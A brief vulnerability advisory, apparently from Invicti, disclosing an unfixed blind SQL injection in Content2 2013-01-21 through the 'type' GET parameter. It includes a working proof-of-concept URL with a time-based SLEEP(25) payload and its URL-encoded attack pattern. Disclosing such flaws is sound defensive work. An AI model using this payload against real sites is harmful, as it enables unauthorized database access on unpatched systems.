Name: Blind SQL Injection Vulnerability in Content2 2013-01-21
Affected Software: Content2 2013-01-21
Affected Versions: 2013-01-21
Vendor Homepage: 
Vulnerability Type: Blind SQL Injection
Severity: Critical
Status: Not Fixed
Invicti Advisory Reference: NS-17-016

Technical Details

Proof of Concept URL for Blind SQL Injection vulnerability in Content2 2013-01-21;

URL: /content2/index.php?moduledir=artikel&module=media&modulerefresh=false&type='+((SELECT 1 FROM (SELECT SLEEP(25))A))+'&id=3&value=3&searchstring=3
Parameter Name: type
Parameter Type: GET
Attack Pattern: %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27

Advisory Timeline

08 Mar 2017 – Advisory released.


No solution is available at the time of publishing this advisory.

